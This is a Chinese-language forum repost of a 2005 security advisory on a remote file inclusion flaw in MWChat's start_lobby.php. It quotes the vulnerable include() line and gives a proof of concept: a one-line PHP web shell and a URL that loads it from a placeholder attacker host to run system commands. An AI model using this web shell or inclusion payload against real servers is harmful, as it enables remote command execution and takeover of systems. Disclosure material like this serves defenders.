[翻译]MWChat包含文件存在漏洞,可执行任意指令
资料翻译: fpx[BCT]翻译网站: Bug.Center.Team [url]http://www.cnbct.org[/url]
SecurityTracker ID: 1014090
CVE 叁考: GENERIC-MAP-NOMATCH
日期: 2005 年6月 2 日
影响: 经由网络运行任意程序。
影响版本: 6. X
漏洞公布:Status-x
摘要:
MWChat 'start_lobby.php' 包含的'chat_maintainance.php' 脚本中的'$CONFIG[ MWCHAT_Libs]' 叁数设置不当。攻击者通过构造特殊的url在目标系统上运行任意PHP 指令,包括操作系统指令, 取得系统权限。
漏洞代码:
start_lobby.php部分代码
*********************************************************************
$Sequence = $STATUS[CLIENT_IP]; $Sequence_Check
= base64_encode($Sequence);
include("$CONFIG[MWCHAT_Libs]/chat_maintainance.php");
$rgLobby_SELECT = db_query(Validate(3), $CONN); $szResult
= db_numrows($rgLobby_SELECT); if ($szResult == "0")
*********************************************************************
$CONFIG[MWCHAT_Libs]参数未经任何过滤。
漏洞利用:
cmd.txt
***************
<?
system($cmd)
?>
***************
http://[target]/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://[attacker]/cmd.txt?&cmd=uname%20-a
厂商网址: [url]www.appindex.net[/url]
页:
[1]